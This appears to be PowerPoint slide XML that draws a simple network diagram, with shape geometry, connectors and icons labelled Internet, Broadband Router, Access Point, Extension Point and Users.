              <a:cxn ang="0">
                <a:pos x="219" y="318"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="230" y="319"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="250" y="316"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="266" y="303"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="277" y="287"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="282" y="267"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="281" y="256"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="273" y="236"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="259" y="221"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="239" y="214"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="230" y="212"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="282" h="319">
                <a:moveTo>
                  <a:pt x="230" y="212"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="230" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221" y="214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212" y="216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="204" y="220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197" y="223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105" y="169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105" y="169"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105" y="160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105" y="160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105" y="151"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197" y="96"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="197" y="96"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="204" y="100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212" y="104"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="230" y="107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="230" y="107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250" y="102"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259" y="98"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="273" y="84"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="277" y="75"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="281" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="281" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="277" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="273" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="230" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="230" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="219" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="192" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181" y="33"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="175" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="175" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="118"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="113"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68" y="109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52" y="107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52" y="107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="111"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="116"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="122"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="149"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23" y="203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30" y="209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68" y="211"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="78" y="207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="202"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177" y="258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177" y="258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="175" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="175" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="177" y="278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181" y="287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184" y="296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="192" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199" y="310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="208" y="316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="219" y="318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="230" y="319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="230" y="319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250" y="316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259" y="310"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="273" y="296"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="277" y="287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="281" y="278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="281" y="256"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="277" y="245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="273" y="236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266" y="229"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259" y="221"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="250" y="218"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="230" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="230" y="21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240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ECABF89-CC25-4E29-824E-D4F2DE200983}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="473892" y="1261717"/>
            <a:ext cx="4074886" cy="2334926"/>
            <a:chOff x="435420" y="1383637"/>
            <a:chExt cx="4074886" cy="2334926"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="300" name="Rectangle 218">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFD9A487-9CD9-40A2-91D1-C515D3177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420" y="1405074"/>
              <a:ext cx="4074886" cy="2313489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FFFF">
                    <a:gamma/>
                    <a:shade val="89020"/>
                    <a:invGamma/>
                  </a:srgbClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="2700000" scaled="1"/>
            </a:gradFill>
            <a:ln w="15875">
              <a:solidFill>
                <a:srgbClr val="DDDDDD"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd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01" name="Rectangle 219">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E46199A-A412-4F8B-ADB1-67BDFA2C8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467" y="1421015"/>
              <a:ext cx="4050792" cy="2281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02" name="Group 301">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64D696E1-E5F1-4698-B640-2737A3F6EF17}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="440567" y="1383637"/>
              <a:ext cx="3979268" cy="2271777"/>
              <a:chOff x="3416321" y="1314864"/>
              <a:chExt cx="3979268" cy="2271777"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="303" name="Oval 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B573D30-81A1-4EE3-98C2-2200C8D5DB70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4794933" y="2067985"/>
                <a:ext cx="1382622" cy="1380565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04" name="Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42980924-D446-467A-BAC8-7172C073FDF7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4885371" y="2162623"/>
                <a:ext cx="1201022" cy="1199235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05" name="Oval 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28862EC0-BFC0-4B7A-B4B3-7C8D3B076679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4985215" y="2266653"/>
                <a:ext cx="1010016" cy="1008513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06" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF595D6D-E9BA-47C3-9797-4ADA93B6A41C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5072036" y="2370683"/>
                <a:ext cx="819010" cy="817791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07" name="Oval 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7202608F-3F82-4149-870B-EAB466426508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5171880" y="2470379"/>
                <a:ext cx="628004" cy="627070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08" name="Oval 7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34314F91-81A9-4BCF-908B-EA73846EDB4B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4323837" y="1430177"/>
                <a:ext cx="1382622" cy="1380565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09" name="Oval 8">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6BE11D7-AC0B-449E-A530-18D23EE1D098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4414275" y="1524815"/>
                <a:ext cx="1201022" cy="1199235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10" name="Oval 9">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA8F53AA-682C-4B24-95EB-A9171E8F21D4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4514119" y="1628845"/>
                <a:ext cx="1010016" cy="1008513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11" name="Oval 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3F24164-E86C-454F-82FC-95627F7C53A3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4600940" y="1732875"/>
                <a:ext cx="819010" cy="817791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12" name="Oval 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4473F51A-0EA8-4864-8085-15618A59AD73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4700784" y="1832571"/>
                <a:ext cx="628004" cy="627070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A38C0EBB-33E5-4CA7-B6CD-D0513584CCE5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="4278317" y="2247598"/>
                <a:ext cx="590016" cy="1"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C0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14" name="Picture 6" descr="E:\haja Premium\Wireless_Modem.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B82ACD72-D481-4A6B-A63B-B5BEE8507B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753492" y="1837466"/>
                <a:ext cx="527472" cy="5274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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="315" name="Straight Connector 314">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E41BC4CD-E5F6-4CA4-90D9-6FE2CE68E4E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963412" y="2928018"/>
                <a:ext cx="530254" cy="335648"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C0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F9A5B5AF-FC54-4E68-84CA-A63DA8505D8D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5487729" y="2928018"/>
                <a:ext cx="0" cy="328922"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C0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Straight Connector 316">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71A6F767-DE2D-4DAA-8962-37F21557A7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3666" y="2928018"/>
                <a:ext cx="460019" cy="324252"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C0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Straight Connector 317">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4FEDDE8-8E7C-4DF2-8873-F372DA080903}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5233614" y="2290577"/>
                <a:ext cx="640080" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C0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19" name="Picture 8" descr="E:\Icon Shock\CLEAN\Networking\router_256.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{120911C9-A3F4-4263-A554-CB9CDE93E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18234" y="1931480"/>
                <a:ext cx="706318" cy="70631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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="320" name="Elbow Connector 78">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0B1C672-BA60-4518-AD96-99BDFAB4CD60}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="16200000" flipH="1">
                <a:off x="4889211" y="2500524"/>
                <a:ext cx="484632" cy="228600"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:prstDash val="sysDot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Elbow Connector 79">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{294301FF-02AE-4629-A364-BB65E9539D7C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="5400000" flipH="1" flipV="1">
                <a:off x="6197130" y="1680480"/>
                <a:ext cx="411480" cy="457200"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C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Arrow Connector 321">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00ACBB1C-6AC2-4A76-A824-A05DB0A4F35C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6981357" y="1909937"/>
                <a:ext cx="0" cy="535753"/>
              </a:xfrm>
              <a:prstGeom prst="straightConnector1">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C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3" name="Rectangle 322">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C514BC8-1100-414A-9C36-13865E965214}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="6706292" y="3041997"/>
                <a:ext cx="530915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Internet</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="324" name="Rectangle 323">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4C5CF6F-E974-42E6-A55B-C359DAA92F44}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5741281" y="2368630"/>
                <a:ext cx="677360" cy="33855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Broadband Router</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="325" name="Rectangle 324">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{373E187E-6928-4CC6-A3DE-41D87B9B5E28}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4101775" y="3305146"/>
                <a:ext cx="423514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Users</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="326" name="Rectangle 325">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E4207DD-2EB6-47CD-B7E3-D3ED58132F55}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3416321" y="2104222"/>
                <a:ext cx="45236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Users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27" name="Rectangle 326">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F582A171-9CE5-4672-A37D-42C326656C95}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5184148" y="1958752"/>
                <a:ext cx="541277" cy="33855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Access Point </a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="328" name="Rectangle 327">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0706592-FBDB-4AB9-AD97-C85E9EB7EE04}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5687840" y="2721895"/>
                <a:ext cx="746728" cy="33855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Extension Point</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="329" name="Picture 10" descr="E:\Icon Shock\CLEAN\Networking\wan_256.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E5EB063-816B-4654-AA09-EFB96FE051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duotone>
                  <a:schemeClr val="bg2">
                    <a:shade val="45000"/>
                    <a:satMod val="135000"/>
                  </a:scheme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18639" y="1314864"/>
                <a:ext cx="776950" cy="776950"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="330" name="Straight Connector 329">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29D06E4C-23D1-4725-BA4B-DE464116FF30}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="4181952" y="2502186"/>
                <a:ext cx="742589" cy="1673"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:prstDash val="sysDot"/>
              </a:ln>
              <a:scene3d>
                <a:camera prst="orthographicFront">
                  <a:rot lat="0" lon="0" rev="2700000"/>
                </a:camera>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene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" name="Straight Connector 330">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A87AAB77-CA52-4EAB-AD5A-01F289F00974}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm rot="16200000" flipV="1">
                <a:off x="4186002" y="1976039"/>
                <a:ext cx="742589" cy="1673"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:ln w="19050">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:prstDash val="sysDot"/>
              </a:ln>
              <a:scene3d>
                <a:camera prst="orthographicFront">
                  <a:rot lat="0" lon="0" rev="2700000"/>
                </a:camera>
                <a:lightRig rig="threePt" dir="t"/>
              </a:scene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32" name="Picture 6" descr="E:\haja Premium\Wireless_Modem.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B18F40A-9490-47D0-9342-DA1E3BC7DD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3184" y="2422106"/>
                <a:ext cx="527472" cy="5274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33" name="Picture 2" descr="F:\Prashant DATA\ICONS\Web2.0 PNG Icons\Globe and Internet\Globe 1.png">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4347CB20-99E4-40CF-A616-EFC95374C5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60304" y="2432741"/>
                <a:ext cx="642107" cy="64210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9EA0197B-D740-4F78-9DE9-63D459001F48}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3778146" y="2010716"/>
                <a:ext cx="627634" cy="469392"/>
                <a:chOff x="3708503" y="2026315"/>
                <a:chExt cx="627634" cy="469392"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="350" name="Picture 349" descr="A close up of a screen&#10;&#10;Description automatically generated">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFD14A3A-2341-4B61-A8DD-E305BA73474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979214" y="2129993"/>
                  <a:ext cx="356923" cy="365714"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="351" name="Picture 350">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E48BC68-BCD4-4DF8-A4B1-16D1B6C5141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8503" y="2026315"/>
                  <a:ext cx="297846" cy="439322"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
              </p:spPr>
            </p:pic>
          </p:grpSp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="335" name="Group 334">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81C76BFC-BB69-4209-9439-F8FF0C624B06}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
